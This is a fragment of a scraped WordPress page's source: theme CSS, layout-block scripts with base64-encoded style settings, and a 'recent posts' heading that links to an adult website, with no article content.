.td_module_wrap:nth-child(2n+1){clear:both!important}.tdi_185 .td_module_wrap:nth-last-child(-n+2){margin-bottom:0!important;padding-bottom:0!important}.tdi_185 .td_module_wrap .td-module-container:before{display:block!important}.tdi_185 .td_module_wrap:nth-last-child(-n+2) .td-module-container:before{display:none!important}.tdi_185 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_185 .td-module-exclusive .td-module-title a:before{font-size:11px!important}.tdi_185 .entry-title{margin:6px 0 0 0;font-size:14px!important}.tdi_185 .td-post-category{font-size:12px!important}@media (min-width:768px){.tdi_185 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (min-width:768px) and (max-width:1018px){.tdi_185 .td-module-meta-info{padding:12px 0 0 0}.tdi_185 .td_module_wrap{padding-left:5px;padding-right:5px;padding-bottom:8px;margin-bottom:8px;clear:none!important;padding-bottom:8px!important;margin-bottom:8px!important}.tdi_185 .td_block_inner{margin-left:-5px;margin-right:-5px}.tdi_185 .td-module-container:before{bottom:-8px}.tdi_185 .td_module_wrap:nth-child(2n+1){clear:both!important}.tdi_185 .td_module_wrap:nth-last-child(-n+2){margin-bottom:0!important;padding-bottom:0!important}.tdi_185 .td_module_wrap .td-module-container:before{display:block!important}.tdi_185 .td_module_wrap:nth-last-child(-n+2) .td-module-container:before{display:none!important}.tdi_185 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_185 .td-module-exclusive .td-module-title a:before{font-size:11px!important}.tdi_185 .entry-title{margin:4px 0 0 0;font-size:13px!important}.tdi_185 .td-post-category{font-size:12px!important}@media (min-width:768px){.tdi_185 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (max-width:767px){.tdi_185 .td-module-meta-info{max-width:100%}.tdi_185 .td_module_wrap{width:100%;float:left;padding-left:0px;padding-right:0px;padding-bottom:10px;margin-bottom:10px;padding-bottom:10px!important;margin-bottom:10px!important}.rtl .tdi_185 .td_module_wrap{float:right}.tdi_185 .td_block_inner{margin-left:-0px;margin-right:-0px}.tdi_185 .td-module-container:before{bottom:-10px}.tdi_185 .td_module_wrap:nth-last-child(1){margin-bottom:0!important;padding-bottom:0!important}.tdi_185 .td_module_wrap .td-module-container:before{display:block!important}.tdi_185 .td_module_wrap:nth-last-child(1) .td-module-container:before{display:none!important}.tdi_185 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_185 .td-module-exclusive .td-module-title a:before{font-size:11px!important}@media (min-width:768px){.tdi_185 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}</style><script type="rocketlazyloadscript">var block_tdi_185 = new tdBlock();
  2185. block_tdi_185.id = "tdi_185";
  2186. block_tdi_185.atts = '{"modules_on_row":"eyJhbGwiOiI1MCUiLCJwaG9uZSI6IjEwMCUifQ==","limit":"4","modules_category":"above","show_btn":"none","show_excerpt":"eyJwb3J0cmFpdCI6Im5vbmUiLCJhbGwiOiJub25lIn0=","ajax_pagination":"","td_ajax_preloading":"","sort":"","category_id":"","f_title_font_size":"eyJhbGwiOiIxNiIsInBvcnRyYWl0IjoiMTMiLCJsYW5kc2NhcGUiOiIxNCJ9","f_title_font_line_height":"1.3","show_cat":"","meta_info_border_style":"","meta_padding":"eyJhbGwiOiIxNnB4IDAgMCAwIiwibGFuZHNjYXBlIjoiMTRweCAwIDAgMCIsInBvcnRyYWl0IjoiMTJweCAwIDAgMCJ9","modules_divider":"","image_size":"","meta_info_align":"","image_floated":"","tdc_css":"eyJhbGwiOnsibWFyZ2luLWJvdHRvbSI6IjAiLCJkaXNwbGF5IjoiIn0sImxhbmRzY2FwZSI6eyJkaXNwbGF5IjoiIn0sImxhbmRzY2FwZV9tYXhfd2lkdGgiOjExNDAsImxhbmRzY2FwZV9taW5fd2lkdGgiOjEwMTksInBvcnRyYWl0Ijp7ImRpc3BsYXkiOiIifSwicG9ydHJhaXRfbWF4X3dpZHRoIjoxMDE4LCJwb3J0cmFpdF9taW5fd2lkdGgiOjc2OCwicGhvbmUiOnsibWFyZ2luLWJvdHRvbSI6IjAiLCJkaXNwbGF5IjoiIn0sInBob25lX21heF93aWR0aCI6NzY3fQ==","meta_info_horiz":"content-horiz-left","f_title_font_weight":"600","image_height":"54","all_modules_space":"eyJhbGwiOiIzMCIsInBob25lIjoiMjAiLCJwb3J0cmFpdCI6IjE2IiwibGFuZHNjYXBlIjoiMjAifQ==","art_excerpt":"0","art_title":"eyJhbGwiOiI4cHggMCAwIDAiLCJsYW5kc2NhcGUiOiI2cHggMCAwIDAiLCJwb3J0cmFpdCI6IjRweCAwIDAgMCJ9","btn_bg":"rgba(255,255,255,0)","f_btn_font_transform":"uppercase","f_btn_font_weight":"","f_cat_font_transform":"uppercase","f_cat_font_weight":"600","btn_bg_hover":"rgba(255,255,255,0)","meta_width":"eyJwaG9uZSI6IjEwMCUifQ==","show_audio":"","show_com":"none","show_date":"none","show_author":"none","mc1_el":"10","f_title_font_family":"456","f_title_font_transform":"","title_txt":"#000000","title_txt_hover":"#f43f3f","cat_txt":"#000000","cat_bg":"rgba(255,255,255,0)","cat_bg_hover":"rgba(255,255,255,0)","modules_category_padding":"0","f_cat_font_family":"653","f_cat_font_size":"eyJhbGwiOiIxMyIsImxhbmRzY2FwZSI6IjEyIiwicG9ydHJhaXQiOiIxMiJ9","f_cat_font_line_height":"1","modules_gap":"eyJhbGwiOiIyMCIsImxhbmRzY2FwZSI6IjE1IiwicG9ydHJhaXQiOiIxMCIsInBob25lIjoiMCJ9","modules_category_margin":"0","modules_cat_border":"0","f_cat_font_spacing":"-0.5","cat_txt_hover":"#ec3535","offset":"1","locked_only":"yes","f_excl_font_transform":"uppercase","f_excl_font_weight":"600","f_excl_font_family":"653","f_excl_font_size":"eyJhbGwiOiIxMiIsInBvcnRyYWl0IjoiMTEiLCJwaG9uZSI6IjExIiwibGFuZHNjYXBlIjoiMTEifQ==","f_excl_font_line_height":"1","excl_padd":"4px 6px","excl_radius":"2","excl_bg":"#ec3535","excl_bg_h":"#ec3535","excl_color":"#ffffff","excl_color_h":"#ffffff","excl_margin":"-4px 8px 0 0","post_ids":"","block_type":"td_flex_block_1","separator":"","custom_title":"","custom_url":"","block_template_id":"","title_tag":"","mc1_tl":"","mc1_title_tag":"","taxonomies":"","category_ids":"","in_all_terms":"","tag_slug":"","autors_id":"","installed_post_types":"","include_cf_posts":"","exclude_cf_posts":"","linked_posts":"","favourite_only":"","open_in_new_window":"","show_modified_date":"","time_ago":"","time_ago_add_txt":"ago","time_ago_txt_pos":"","review_source":"","el_class":"","td_query_cache":"","td_query_cache_expiration":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","container_width":"","m_padding":"","modules_border_size":"","modules_border_style":"","modules_border_color":"#eaeaea","modules_border_radius":"","modules_divider_color":"#eaeaea","h_effect":"","image_alignment":"50","image_width":"","image_radius":"","hide_image":"","show_favourites":"","fav_size":"2","fav_space":"","fav_ico_color":"","fav_ico_color_h":"","fav_bg":"","fav_bg_h":"","fav_shadow_shadow_header":"","fav_shadow_shadow_title":"Shadow","fav_shadow_shadow_size":"","fav_shadow_shadow_offset_horizontal":"","fav_shadow_shadow_offset_vertical":"","fav_shadow_shadow_spread":"","fav_shadow_shadow_color":"","video_icon":"","video_popup":"yes","video_rec":"","spot_header":"","video_rec_title":"","video_rec_color":"","video_rec_disable":"","autoplay_vid":"yes","show_vid_t":"block","vid_t_margin":"","vid_t_padding":"","video_title_color":"","video_title_color_h":"","video_bg":"","video_overlay":"","vid_t_color":"","vid_t_bg_color":"","f_vid_title_font_header":"","f_vid_title_font_title":"Video pop-up article title","f_vid_title_font_settings":"","f_vid_title_font_family":"","f_vid_title_font_size":"","f_vid_title_font_line_height":"","f_vid_title_font_style":"","f_vid_title_font_weight":"","f_vid_title_font_transform":"","f_vid_title_font_spacing":"","f_vid_title_":"","f_vid_time_font_title":"Video duration text","f_vid_time_font_settings":"","f_vid_time_font_family":"","f_vid_time_font_size":"","f_vid_time_font_line_height":"","f_vid_time_font_style":"","f_vid_time_font_weight":"","f_vid_time_font_transform":"","f_vid_time_font_spacing":"","f_vid_time_":"","excl_show":"inline-block","excl_txt":"","all_excl_border":"","all_excl_border_style":"solid","all_excl_border_color":"","excl_border_color_h":"","f_excl_font_header":"","f_excl_font_title":"Label text","f_excl_font_settings":"","f_excl_font_style":"","f_excl_font_spacing":"","f_excl_":"","meta_margin":"","meta_space":"","art_btn":"","meta_info_border_size":"","meta_info_border_color":"#eaeaea","meta_info_border_radius":"","modules_category_radius":"0","modules_extra_cat":"","author_photo":"","author_photo_size":"","author_photo_space":"","author_photo_radius":"","show_review":"inline-block","review_space":"","review_size":"2.5","review_distance":"","excerpt_col":"1","excerpt_gap":"","excerpt_middle":"","excerpt_inline":"","hide_audio":"","art_audio":"","art_audio_size":"1.5","btn_title":"","btn_margin":"","btn_padding":"","btn_border_width":"","btn_radius":"","pag_space":"","pag_padding":"","pag_border_width":"","pag_border_radius":"","prev_tdicon":"","next_tdicon":"","pag_icons_size":"","f_header_font_header":"","f_header_font_title":"Block header","f_header_font_settings":"","f_header_font_family":"","f_header_font_size":"","f_header_font_line_height":"","f_header_font_style":"","f_header_font_weight":"","f_header_font_transform":"","f_header_font_spacing":"","f_header_":"","f_ajax_font_title":"Ajax categories","f_ajax_font_settings":"","f_ajax_font_family":"","f_ajax_font_size":"","f_ajax_font_line_height":"","f_ajax_font_style":"","f_ajax_font_weight":"","f_ajax_font_transform":"","f_ajax_font_spacing":"","f_ajax_":"","f_more_font_title":"Load more button","f_more_font_settings":"","f_more_font_family":"","f_more_font_size":"","f_more_font_line_height":"","f_more_font_style":"","f_more_font_weight":"","f_more_font_transform":"","f_more_font_spacing":"","f_more_":"","f_title_font_header":"","f_title_font_title":"Article title","f_title_font_settings":"","f_title_font_style":"","f_title_font_spacing":"","f_title_":"","f_cat_font_title":"Article category tag","f_cat_font_settings":"","f_cat_font_style":"","f_cat_":"","f_meta_font_title":"Article meta info","f_meta_font_settings":"","f_meta_font_family":"","f_meta_font_size":"","f_meta_font_line_height":"","f_meta_font_style":"","f_meta_font_weight":"","f_meta_font_transform":"","f_meta_font_spacing":"","f_meta_":"","f_ex_font_title":"Article excerpt","f_ex_font_settings":"","f_ex_font_family":"","f_ex_font_size":"","f_ex_font_line_height":"","f_ex_font_style":"","f_ex_font_weight":"","f_ex_font_transform":"","f_ex_font_spacing":"","f_ex_":"","f_btn_font_title":"Article read more button","f_btn_font_settings":"","f_btn_font_family":"","f_btn_font_size":"","f_btn_font_line_height":"","f_btn_font_style":"","f_btn_font_spacing":"","f_btn_":"","mix_color":"","mix_type":"","fe_brightness":"1","fe_contrast":"1","fe_saturate":"1","mix_color_h":"","mix_type_h":"","fe_brightness_h":"1","fe_contrast_h":"1","fe_saturate_h":"1","m_bg":"","color_overlay":"","shadow_shadow_header":"","shadow_shadow_title":"Module Shadow","shadow_shadow_size":"","shadow_shadow_offset_horizontal":"","shadow_shadow_offset_vertical":"","shadow_shadow_spread":"","shadow_shadow_color":"","all_underline_height":"","all_underline_color":"","cat_border":"","cat_border_hover":"","meta_bg":"","author_txt":"","author_txt_hover":"","date_txt":"","ex_txt":"","com_bg":"","com_txt":"","rev_txt":"","audio_btn_color":"","audio_time_color":"","audio_bar_color":"","audio_bar_curr_color":"","shadow_m_shadow_header":"","shadow_m_shadow_title":"Meta info shadow","shadow_m_shadow_size":"","shadow_m_shadow_offset_horizontal":"","shadow_m_shadow_offset_vertical":"","shadow_m_shadow_spread":"","shadow_m_shadow_color":"","btn_txt":"","btn_txt_hover":"","btn_border":"","btn_border_hover":"","pag_text":"","pag_h_text":"","pag_bg":"","pag_h_bg":"","pag_border":"","pag_h_border":"","ajax_pagination_next_prev_swipe":"","ajax_pagination_infinite_stop":"","css":"","td_column_number":1,"header_color":"","color_preset":"","border_top":"","class":"tdi_185","tdc_css_class":"tdi_185","tdc_css_class_style":"tdi_185_rand_style"}';
  2187. block_tdi_185.td_column_number = "1";
  2188. block_tdi_185.block_type = "td_flex_block_1";
  2189. block_tdi_185.post_count = "0";
  2190. block_tdi_185.found_posts = "0";
  2191. block_tdi_185.header_color = "";
  2192. block_tdi_185.ajax_pagination_infinite_stop = "";
  2193. block_tdi_185.max_num_pages = "-0";
  2194. tdBlocksArray.push(block_tdi_185);
  2195. </script><div class="td-block-title-wrap"></div><div id=tdi_185 class="td_block_inner td-mc1-wrap"></div></div></div></div></div></div><div id="tdi_186" class="tdc-row stretch_row_1400 td-stretch-content"><div class="vc_row tdi_187  wpb_row td-pb-row tdc-element-style" >
  2196. <style scoped>.tdi_187,.tdi_187 .tdc-columns{min-height:0}.tdi_187,.tdi_187 .tdc-columns{display:block}.tdi_187 .tdc-columns{width:100%}.tdi_187{margin-top:246px!important;padding-bottom:60px!important;position:relative}.tdi_187 .td_block_wrap{text-align:left}@media (max-width:767px){.tdi_187{margin-top:170px!important;padding-bottom:40px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_187{margin-top:166px!important;padding-bottom:40px!important}}@media (min-width:1019px) and (max-width:1140px){.tdi_187{margin-top:170px!important;padding-bottom:40px!important}}</style>
  2197. <div class="tdi_186_rand_style td-element-style" ><style>.tdi_186_rand_style{background-color:#f7f7f7!important}</style></div><div class="vc_column tdi_189  wpb_column vc_column_container tdc-column td-pb-span12">
  2198. <style scoped>.tdi_189{vertical-align:baseline}.tdi_189>.wpb_wrapper,.tdi_189>.wpb_wrapper>.tdc-elements{display:block}.tdi_189>.wpb_wrapper>.tdc-elements{width:100%}.tdi_189>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_189>.wpb_wrapper{width:auto;height:auto}@media (min-width:768px) and (max-width:1018px){.tdi_189{padding-top:0px!important}}</style><div class="wpb_wrapper" ><div class="vc_row_inner tdi_191  vc_row vc_inner wpb_row td-pb-row" >
  2199. <style scoped>.tdi_191{position:relative!important;top:0;transform:none;-webkit-transform:none}.tdi_191,.tdi_191 .tdc-inner-columns{display:block}.tdi_191 .tdc-inner-columns{width:100%}.tdi_191{margin-top:-246px!important}.tdi_191 .td_block_wrap{text-align:left}@media (min-width:768px) and (max-width:1018px){.tdi_191{margin-top:-160px!important}}@media (min-width:1019px) and (max-width:1140px){.tdi_191{margin-top:-170px!important}}@media (max-width:767px){.tdi_191{margin-top:-170px!important;width:100%!important}}</style><div class="vc_column_inner tdi_193  wpb_column vc_column_container tdc-inner-column td-pb-span12">
  2200. <style scoped>.tdi_193{vertical-align:baseline}.tdi_193 .vc_column-inner>.wpb_wrapper,.tdi_193 .vc_column-inner>.wpb_wrapper .tdc-elements{display:block}.tdi_193 .vc_column-inner>.wpb_wrapper .tdc-elements{width:100%}</style><div class="vc_column-inner"><div class="wpb_wrapper" ><div class="td_block_wrap td_block_title tdi_194 td-pb-border-top td_block_template_13 td-fix-index"  data-td-block-uid="tdi_194" >
  2201. <style>.tdi_194 .td-block-title>a,.tdi_194 .td-block-title>span{color:#000000!important}.tdi_194 .td-block-subtitle{color:#f7f7f7!important}.tdi_194{margin-bottom:50px!important}@media (min-width:1019px) and (max-width:1140px){.tdi_194{margin-bottom:40px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_194{margin-bottom:36px!important}}@media (max-width:767px){.tdi_194{margin-bottom:40px!important}}</style>
  2202. <style>body .tdi_194 .td-block-title a,body .tdi_194 .td-block-title span{font-family:Work Sans!important;font-size:32px!important;line-height:1!important;font-weight:700!important;letter-spacing:-1px!important}body .tdi_194 .td-block-title{text-align:center}body .tdi_194.td_block_template_4 .td-block-title>*:before,body .tdi_194.td_block_template_17 .td-block-title:after,body .tdi_194.td_block_template_13 .td-block-subtitle,body .tdi_194.td_block_template_9 .td-block-title:after{right:0;left:0}body .tdi_194.td_block_template_5 .td-block-title>*{border-width:0 0 0 4px}body .tdi_194.td_block_template_8 .td-block-title>*{padding-left:20px;padding-right:20px}@media (min-width:1019px) and (max-width:1140px){body .tdi_194 .td-block-title a,body .tdi_194 .td-block-title span{font-size:26px!important}}@media (min-width:768px) and (max-width:1018px){body .tdi_194 .td-block-title a,body .tdi_194 .td-block-title span{font-size:20px!important}}</style><div class="td-block-title-wrap"><h4 class="td-block-title td-title-align"><a href="https://pornmate.com/" target="_blank" rel="noopener">Kürzliche Posts</a><div class="td-block-subtitle"></div></h4></div></div></div></div></div></div><div class="vc_row_inner tdi_196  vc_row vc_inner wpb_row td-pb-row" >
  2203. <style scoped>.tdi_196{position:relative!important;top:0;transform:none;-webkit-transform:none}.tdi_196,.tdi_196 .tdc-inner-columns{display:block}.tdi_196 .tdc-inner-columns{width:100%}</style><div class="vc_column_inner tdi_198  wpb_column vc_column_container tdc-inner-column td-pb-span9">
  2204. <style scoped>.tdi_198{vertical-align:baseline}.tdi_198 .vc_column-inner>.wpb_wrapper,.tdi_198 .vc_column-inner>.wpb_wrapper .tdc-elements{display:block}.tdi_198 .vc_column-inner>.wpb_wrapper .tdc-elements{width:100%}</style><div class="vc_column-inner"><div class="wpb_wrapper" ><div class="td_block_wrap td_flex_block_1 tdi_199 td-pb-border-top td_block_template_1 td_flex_block"  data-td-block-uid="tdi_199" >
  2205. <style>.tdi_199{margin-bottom:25px!important}@media (min-width:1019px) and (max-width:1140px){.tdi_199{margin-bottom:20px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_199{margin-bottom:15px!important}}@media (max-width:767px){.tdi_199{margin-bottom:40px!important}}</style>
  2206. <style>.tdi_199 .td-image-wrap{padding-bottom:70%}.tdi_199 .entry-thumb{background-position:center 50%}.tdi_199 .td-image-container{flex:0 0 50%;width:50%;display:block;order:0;margin-left:0;margin-right:auto}.ie10 .tdi_199 .td-image-container,.ie11 .tdi_199 .td-image-container{flex:0 0 auto}.tdi_199 .td-module-container{flex-direction:row;border-color:#eaeaea!important}.ie10 .tdi_199 .td-module-meta-info,.ie11 .tdi_199 .td-module-meta-info{flex:1}body .tdi_199 .td-favorite{font-size:36px;box-shadow:1px 1px 4px 0px rgba(0,0,0,0.2)}.tdi_199 .td-module-meta-info{padding:0 0 0 30px;display:flex;flex-direction:column;justify-content:center;border-color:#eaeaea}.tdi_199 .td-category-pos-above .td-post-category{align-self:flex-start;align-self:flex-start!important}.tdi_199 .td_module_wrap{padding-left:0px;padding-right:0px;padding-bottom:15px;margin-bottom:15px}.tdi_199 .td_block_inner{margin-left:-0px;margin-right:-0px}.tdi_199 .td-module-container:before{bottom:-15px;border-color:#eaeaea}.tdi_199 .td-post-vid-time{display:block}.tdi_199 .td-post-category{margin:0 12px 0 0;padding:5px 0;border-radius:2px;background-color:rgba(255,255,255,0);color:#000000;border-width:0px;border-style:solid;border-color:#aaa;font-family:Work Sans!important;font-size:13px!important;line-height:1!important;font-weight:600!important;text-transform:uppercase!important}.tdi_199 .td-author-photo .avatar{width:20px;height:20px;margin-right:6px;border-radius:100%}.tdi_199 .td-audio-player{opacity:1;visibility:visible;height:auto;font-size:13px}.tdi_199 .td-read-more{display:none}.tdi_199 .td-author-date{display:inline}.tdi_199 .entry-review-stars{display:inline-block}.tdi_199 .td-icon-star,.tdi_199 .td-icon-star-empty,.tdi_199 .td-icon-star-half{font-size:15px}.tdi_199 .td-module-comments{display:none}.tdi_199 .td_module_wrap:nth-last-child(1){margin-bottom:0;padding-bottom:0}.tdi_199 .td_module_wrap:nth-last-child(1) .td-module-container:before{display:none}.tdi_199 .td-post-category:hover{background-color:rgba(255,255,255,0)!important;color:#ec3535}.tdi_199 .td-module-title a{color:#000000;box-shadow:inset 0 0 0 0 #000}.tdi_199 .td_module_wrap:hover .td-module-title a{color:#f43f3f!important}.tdi_199 .td-post-author-name a{color:#000000}.tdi_199 .td-post-author-name:hover a{color:#ec3535}.tdi_199 .td-post-date,.tdi_199 .td-post-author-name span{color:#000000}.tdi_199 .td-excerpt{color:#000000;margin:10px 0 0 0;column-count:1;column-gap:48px;font-family:Work Sans!important;font-size:16px!important;line-height:1.4!important;font-weight:500!important}.tdi_199 .td-module-meta-info,.tdi_199 .td-next-prev-wrap{text-align:left}.tdi_199 .td-category-pos-image .td-post-category:not(.td-post-extra-category){left:0;right:auto;transform:translateX(0);-webkit-transform:translateX(0)}.tdi_199 .td-ajax-next-page{margin-right:auto;margin-left:0}.tdi_199 .td-module-exclusive .td-module-title a:before{display:inline-block;margin:-4px 10px 0 0;padding:4px 6px;border-radius:2px;color:#ffffff;background-color:#ec3535;font-family:Work Sans!important;font-size:12px!important;line-height:1!important;font-weight:600!important;text-transform:uppercase!important}.tdi_199 .td-module-exclusive:hover .td-module-title a:before{color:#ffffff;background-color:#ec3535}.tdi_199 .entry-title{margin:0 0 12px 0;font-family:PT Serif!important;font-size:30px!important;line-height:1.1!important;font-weight:600!important}.tdi_199 .td-read-more a{background-color:rgba(255,255,255,0)!important;text-transform:uppercase!important}.tdi_199 .td-read-more:hover a{background-color:rgba(255,255,255,0)!important}.tdi_199 .td-editor-date,.tdi_199 .td-editor-date .td-post-author-name a,.tdi_199 .td-editor-date .entry-date,.tdi_199 .td-module-comments a{font-family:Work Sans!important;font-size:13px!important;line-height:1!important;font-weight:500!important;text-transform:capitalize!important;letter-spacing:-0.5px!important}html:not([class*='ie']) .tdi_199 .td-module-container:hover .entry-thumb:before{opacity:0}@media (min-width:768px){.tdi_199 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}@media (min-width:1019px) and (max-width:1140px){.tdi_199 .td-module-meta-info{padding:0 0 0 20px}.tdi_199 .td_module_wrap{padding-bottom:10px;margin-bottom:10px;padding-bottom:10px!important;margin-bottom:10px!important}.tdi_199 .td-module-container:before{bottom:-10px}.tdi_199 .td-post-category{margin:0 10px 0 0;font-size:12px!important}.tdi_199 .td-post-author-name{display:none}.tdi_199 .td_module_wrap:nth-last-child(1){margin-bottom:0!important;padding-bottom:0!important}.tdi_199 .td_module_wrap .td-module-container:before{display:block!important}.tdi_199 .td_module_wrap:nth-last-child(1) .td-module-container:before{display:none!important}.tdi_199 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_199 .td-module-exclusive .td-module-title a:before{font-size:11px!important}.tdi_199 .entry-title{margin:0 0 10px 0;font-size:24px!important}.tdi_199 .td-excerpt{margin:6px 0 0 0;font-size:15px!important}@media (min-width:768px){.tdi_199 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (min-width:768px) and (max-width:1018px){.tdi_199 .td-module-meta-info{padding:0 0 0 15px}.tdi_199 .td_module_wrap{padding-bottom:7.5px;margin-bottom:7.5px;padding-bottom:7.5px!important;margin-bottom:7.5px!important}.tdi_199 .td-module-container:before{bottom:-7.5px}.tdi_199 .td-post-category{margin:0 8px 0 0;font-size:12px!important}.tdi_199 .td-excerpt{display:none;margin:0px;font-size:14px!important}.tdi_199 .td-post-author-name{display:none}.tdi_199 .td-icon-star,.tdi_199 .td-icon-star-empty,.tdi_199 .td-icon-star-half{font-size:10px}.tdi_199 .td_module_wrap:nth-last-child(1){margin-bottom:0!important;padding-bottom:0!important}.tdi_199 .td_module_wrap .td-module-container:before{display:block!important}.tdi_199 .td_module_wrap:nth-last-child(1) .td-module-container:before{display:none!important}.tdi_199 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_199 .td-module-exclusive .td-module-title a:before{margin:-2px 8px 0 0;font-size:11px!important}.tdi_199 .entry-title{margin:0 0 8px 0;font-size:20px!important}.tdi_199 .td-editor-date,.tdi_199 .td-editor-date .td-post-author-name a,.tdi_199 .td-editor-date .entry-date,.tdi_199 .td-module-comments a{font-size:12px!important}@media (min-width:768px){.tdi_199 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (max-width:767px){.tdi_199 .td-image-container{flex:0 0 100%;width:100%}.ie10 .tdi_199 .td-image-container,.ie11 .tdi_199 .td-image-container{flex:0 0 auto}.tdi_199 .td-module-container{flex-direction:column}.tdi_199 .td-image-container{display:block;order:0}.ie10 .tdi_199 .td-module-meta-info,.ie11 .tdi_199 .td-module-meta-info{flex:auto}.tdi_199 .td-module-meta-info{max-width:100%;padding:20px 0 0 0}.tdi_199 .td_module_wrap{width:100%;float:left;padding-bottom:15px;margin-bottom:15px;padding-bottom:15px!important;margin-bottom:15px!important}.rtl .tdi_199 .td_module_wrap{float:right}.tdi_199 .td-module-container:before{bottom:-15px}.tdi_199 .td_module_wrap:nth-last-child(1){margin-bottom:0!important;padding-bottom:0!important}.tdi_199 .td_module_wrap .td-module-container:before{display:block!important}.tdi_199 .td_module_wrap:nth-last-child(1) .td-module-container:before{display:none!important}.tdi_199 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_199 .td-module-exclusive .td-module-title a:before{font-size:11px!important}.tdi_199 .entry-title{font-size:24px!important}.tdi_199 .td-post-category{font-size:12px!important}.tdi_199 .td-excerpt{font-size:15px!important}@media (min-width:768px){.tdi_199 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}</style><script type="rocketlazyloadscript">var block_tdi_199 = new tdBlock();
  2207. block_tdi_199.id = "tdi_199";
  2208. block_tdi_199.atts = '{"modules_on_row":"eyJwaG9uZSI6IjEwMCUifQ==","modules_category":"","show_btn":"none","show_excerpt":"eyJwb3J0cmFpdCI6Im5vbmUifQ==","ajax_pagination":"","td_ajax_preloading":"","sort":"","category_id":"","f_title_font_size":"eyJhbGwiOiIzMCIsImxhbmRzY2FwZSI6IjI0IiwicG9ydHJhaXQiOiIyMCIsInBob25lIjoiMjQifQ==","f_title_font_line_height":"1.1","show_cat":"","meta_info_border_style":"","meta_padding":"eyJhbGwiOiIwIDAgMCAzMHB4IiwibGFuZHNjYXBlIjoiMCAwIDAgMjBweCIsInBvcnRyYWl0IjoiMCAwIDAgMTVweCIsInBob25lIjoiMjBweCAwIDAgMCJ9","modules_divider":"","image_size":"","meta_info_align":"center","image_floated":"eyJhbGwiOiJmbG9hdF9sZWZ0IiwicGhvbmUiOiJub19mbG9hdCJ9","tdc_css":"eyJhbGwiOnsibWFyZ2luLWJvdHRvbSI6IjI1IiwiZGlzcGxheSI6IiJ9LCJsYW5kc2NhcGUiOnsibWFyZ2luLWJvdHRvbSI6IjIwIiwiZGlzcGxheSI6IiJ9LCJsYW5kc2NhcGVfbWF4X3dpZHRoIjoxMTQwLCJsYW5kc2NhcGVfbWluX3dpZHRoIjoxMDE5LCJwb3J0cmFpdCI6eyJtYXJnaW4tYm90dG9tIjoiMTUiLCJkaXNwbGF5IjoiIn0sInBvcnRyYWl0X21heF93aWR0aCI6MTAxOCwicG9ydHJhaXRfbWluX3dpZHRoIjo3NjgsInBob25lIjp7Im1hcmdpbi1ib3R0b20iOiI0MCIsImRpc3BsYXkiOiIifSwicGhvbmVfbWF4X3dpZHRoIjo3Njd9","meta_info_horiz":"content-horiz-left","f_title_font_weight":"600","image_height":"70","all_modules_space":"eyJwb3J0cmFpdCI6IjE1IiwiYWxsIjoiMzAiLCJsYW5kc2NhcGUiOiIyMCJ9","art_excerpt":"eyJhbGwiOiIxMHB4IDAgMCAwIiwibGFuZHNjYXBlIjoiNnB4IDAgMCAwIiwicG9ydHJhaXQiOiIwIn0=","art_title":"eyJsYW5kc2NhcGUiOiIwIDAgMTBweCAwIiwicG9ydHJhaXQiOiIwIDAgOHB4IDAiLCJhbGwiOiIwIDAgMTJweCAwIn0=","btn_bg":"rgba(255,255,255,0)","f_btn_font_transform":"uppercase","f_btn_font_weight":"","f_cat_font_transform":"uppercase","f_cat_font_weight":"600","btn_bg_hover":"rgba(255,255,255,0)","meta_width":"eyJwaG9uZSI6IjEwMCUifQ==","show_audio":"","show_com":"none","show_date":"","show_author":"eyJwb3J0cmFpdCI6Im5vbmUiLCJsYW5kc2NhcGUiOiJub25lIn0=","f_title_font_family":"456","f_title_font_transform":"","title_txt":"#000000","title_txt_hover":"#f43f3f","cat_txt":"#000000","cat_bg":"rgba(255,255,255,0)","modules_category_padding":"5px 0","f_cat_font_family":"653","modules_gap":"eyJhbGwiOiIwIiwicGhvbmUiOiIwIn0=","modules_category_margin":"eyJhbGwiOiIwIDEycHggMCAwIiwicG9ydHJhaXQiOiIwIDhweCAwIDAiLCJsYW5kc2NhcGUiOiIwIDEwcHggMCAwIn0=","modules_cat_border":"0","modules_category_radius":"2","columns":"33.33333333%","columns_gap":"eyJhbGwiOiIyMCIsImxhbmRzY2FwZSI6IjE1IiwicG9ydHJhaXQiOiIxMCIsInBob25lIjoiMCJ9","modules_space1":"eyJhbGwiOiIyMCIsImxhbmRzY2FwZSI6IjE1IiwicG9ydHJhaXQiOiIxMiIsInBob25lIjoiMzAifQ==","hide_image3":"yes","image_height1":"70","modules_space2":"eyJhbGwiOiIyMCIsImxhbmRzY2FwZSI6IjE2IiwicG9ydHJhaXQiOiIxMCJ9","meta_padding2":"0","art_title1":"eyJhbGwiOiIwIDAgMTJweCAwIiwibGFuZHNjYXBlIjoiMCAwIDEwcHgiLCJwb3J0cmFpdCI6IjAgMCA4cHgifQ==","art_title2":"eyJhbGwiOiIwIDAgOHB4IDAiLCJwb3J0cmFpdCI6IjAiLCJsYW5kc2NhcGUiOiIwIDAgNnB4IDAifQ==","f_title1_font_family":"456","f_title2_font_family":"653","f_title1_font_size":"eyJhbGwiOiIyNiIsImxhbmRzY2FwZSI6IjE5IiwicG9ydHJhaXQiOiIxNyJ9","f_title1_font_line_height":"1.1","f_title1_font_weight":"600","f_title2_font_weight":"600","f_title1_font_transform":"","f_title2_font_transform":"","title_txt2":"#000000","title_txt_hover2":"#f43f3f","show_excerpt2":"none","show_com2":"none","show_date2":"eyJwb3J0cmFpdCI6Im5vbmUifQ==","show_author2":"none","modules_category3":"","modules_category_margin1":"0","modules_category_margin2":"0","modules_categ